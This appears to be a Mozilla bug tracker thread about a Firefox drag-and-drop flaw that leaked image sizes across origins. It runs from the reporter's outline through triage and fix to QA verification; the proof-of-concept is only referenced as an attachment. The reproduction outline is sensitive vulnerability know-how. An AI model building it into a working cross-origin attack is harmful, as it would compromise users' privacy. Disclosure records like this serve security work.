Same-Origin Policy Bypass Image Size Leak in Drag and Drop
Categories
(Core :: DOM: Copy & Paste and Drag & Drop, defect, P2)
Tracking
()
People
(Reporter: d4ni31, Assigned: tschuster)
References
(Regression)
Details
(4 keywords, Whiteboard: [disclosure deadline 2023-04-29][adv-main110+])
Attachments
(3 files, 1 obsolete file)
leak.jpg
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Steps to reproduce:
Title
- Same-Origin Policy Bypass Image Size Leak in Drag and Drop
Summary
- A Same-Origin Policy Bypass vulnerability exists in the Drag and Drop
- If this vulnerability is exploited, it is possible to bypass the Same-Origin Policy and leak the size of the Image.
Test environment
- Product : Mozilla Firefox 109
- OS : Windows 10 (21H2), macOS Ventura 13.2
Proof-of-Concept
- Please check the attached file!
Reproduce
- Open the server and access the poc page.
- When you drag and drop an image, the size of the image is leaked.
CREDIT Information
- Dohyun Lee (@l33d0hyun) of SSD Labs
|
Reporter | |
Comment 1•2 years ago
|
||
|
|
Reporter | |
Comment 2•2 years ago
|
||
similar case:
CVE-2022-42824 : Same-Origin Policy Bypass Image Size Leak in Apple Safari
https://support.apple.com/ko-kr/HT213495
|
|
Reporter | |
Comment 3•2 years ago
|
||
This bug is subject to a 90-day disclosure deadline. If a fix for this
issue is made available to users before the end of the 90-day deadline,
this bug report will become public 30 days after the fix was made
available. Otherwise, this bug report will become public at the deadline.
The scheduled deadline is 2023-04-29.
|
||
Updated•2 years ago
|
|
||
Comment 4•2 years ago
|
||
Bug 1812611 should fix this case, we would simply not allow access to the image data when dragging in the same tab.
|
|
||
Comment 5•2 years ago
|
||
Does that mean this is also a regression from bug 1437126?
|
|
||
Updated•2 years ago
|
|
|
||
Updated•2 years ago
|
|
||
Comment 6•2 years ago
|
||
Set release status flags based on info from the regressing bug 1437126
|
|
Reporter | |
Comment 7•2 years ago
|
||
This vulnerability works in the same way as the Safari SOP Bypass vulnerabilities I recently reported to Apple, CVE-2022-42824 and CVE-2022-46698.
There was no mention of firefox, but the PoC(CVE-2022-42824, CVE-2022-46698) for it has been released to some people, so a quick patch may be needed.
+crbug.com/1264873 has a very similar poc.
- Please set the sec-level and severity.
|
||
Updated•2 years ago
|
|
|
||
Updated•2 years ago
|
|
|
||
Comment 8•2 years ago
|
||
We'll look at this bug later today in our security triage meeting and assign a rating, hopefully.
|
||
Updated•2 years ago
|
|
|
||
Updated•2 years ago
|
|
|
Reporter | |
Updated•2 years ago
|
|
|
||
Comment 9•2 years ago
|
||
The bug is marked as tracked for firefox110 (beta) and tracked for firefox111 (nightly). We have limited time to fix this, the soft freeze is in 7 days. However, the bug still isn't assigned.
:hsinyi, could you please find an assignee for this tracked bug? Given that it is a regression and we know the cause, we could also simply backout the regressor. If you disagree with the tracking decision, please talk with the release managers.
For more information, please visit auto_nag documentation.
|
|
||
Comment 10•2 years ago
|
||
Tom, could you mark this bug as fixed if it was indeed entirely fixed by bug 1812611? Thanks.
|
|
||
Updated•2 years ago
|
|
Assignee | |
Comment 11•2 years ago
|
||
This indeed entirely fixed by disabling the feature as done in bug 1812611.
|
|
||
Comment 13•2 years ago
|
||
Please stop need-infoing me. Other people will look at this.
|
|
||
Updated•2 years ago
|
|
||
Updated•2 years ago
|
|
|
||
Comment 14•2 years ago
|
||
(In reply to DoHyun Lee from comment #12)
can i get a cve id??
CVEs are typically assigned closer to release of the versions where fixes are shipped. If you are wondering about bug bounties, the bug bounty committee typically meets once a week to make decisions about those. This bug will be updated when either of those things happens.
|
|
||
Updated•2 years ago
|
|
|
||
Updated•2 years ago
|
|
||
Comment 15•2 years ago
|
||
|
|
Reporter | |
Comment 16•2 years ago
|
||
CREDIT Information,
Dohyun Lee (@l33d0hyun) of SSD Labs
Thanks!
|
|
||
Updated•2 years ago
|
|
||
Updated•2 years ago
|
|
|
Reporter | |
Comment 17•2 years ago
|
||
(In reply to DoHyun Lee from comment #16)
CREDIT Information,
Dohyun Lee (@l33d0hyun) of SSD Labs
Thanks!
Please check comment 16!
|
|
||
Comment 18•2 years ago
|
||
|
|
Reporter | |
Comment 20•2 years ago
|
||
Thank you :)
|
||
Updated•2 years ago
|
|
||
Comment 21•2 years ago
•
|
||
Reproduced the issue with Firefox 111.0a1 (2023-01-29) on Windows 10x64. Loaded the attached test case inside a simple python server and dragged an image which resulted in showing the image size in an alert box.
The image size alert box is no longer displayed when dragging the images from the attached test case with Firefox 110.0.1, 111.0b8 and 112.0a1 (2023-03-05) on Windows 10x64, macOS 12 and Ubuntu 20.04.
Just to be extra safe, is the above verification enough? I am not sure if I should look for anything else in order to verify this issue. Thank you in advance!
|
|
Assignee | |
Comment 22•2 years ago
|
||
Thanks Alexandru!
Just to be extra safe, is the above verification enough? I am not sure if I should look for anything else in order to verify this issue. Thank you in advance!
That is good enough. I had previously verified the fix on Nightly myself as well.
|
|
||
Comment 23•2 years ago
|
||
(In reply to Tom Schuster (MoCo) from comment #22)
Thanks Alexandru!
Just to be extra safe, is the above verification enough? I am not sure if I should look for anything else in order to verify this issue. Thank you in advance!
That is good enough. I had previously verified the fix on Nightly myself as well.
Thank you!
Closing per comment 21 and comment 22.
|
|
||
Updated•1 year ago
|
|
||
Updated•6 months ago
|
Description
•